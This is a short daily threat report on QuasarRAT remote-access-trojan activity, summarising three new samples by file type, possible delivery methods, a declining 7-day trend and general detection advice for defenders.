QuasarRAT - Daily Threat Report

Sunday, June 21, 2026

Daily Summary

QuasarRAT activity declined sharply on 2026-06-21 with only 3 new samples detected, representing a 74% drop from the 7-day average of 12. This continues a downward trend, though the sample types suggest possible shifts in delivery tactics rather than an overall threat reduction.

New Samples Detected

The three samples collected today introduce an unusual diversity in file types: one .bat, one .xlsm, and one .exe. The presence of a .bat file is notable, as QuasarRAT historically favors compiled executables or macro-enabled Office documents. This suggests threat actors may be experimenting with script-based initial access, possibly to bypass static analysis rules that flag common PE headers.

Distribution Methods

The inclusion of an .xlsm sample aligns with ongoing phishing campaigns, but the concurrent appearance of a .bat file is unexpected. .bat delivery often points to automated droppers in spear-phishing attachments or shared via cloud storage links. This mix may indicate a small but targeted wave rather than broad spamming, as volume is low enough to suggest hand-picked victims.

7-Day Trend

Today’s 3 samples represent a 74% decline from the 7-day average of 12, placing activity at a quarter of typical levels. This deviation exceeds the 25% threshold for highlighting a trend change. The drop could reflect operational pauses by established groups, shifts to other RATs, or pre-staging for a larger campaign, but sustained monitoring is needed before concluding a genuine downturn.

Security Analysis

The low sample count alongside the appearance of .bat files is a non-obvious development, as QuasarRAT payloads in script form are rare. This may indicate actors probing detection gaps in environments that focus on Office macros or PE files but overlook batch scripts flagged as “low risk.” Defenders should update detection rules to flag any .bat file that attempts process injection, network connections to uncommon ports, or downloads from IP addresses, especially in conjunction with recent user-reported email anomalies.

Further Reading

Data Sources

MalwareBazaar (abuse.ch) ThreatFox (abuse.ch) URLhaus (abuse.ch)

More QuasarRAT Reports

Recent Malware Reports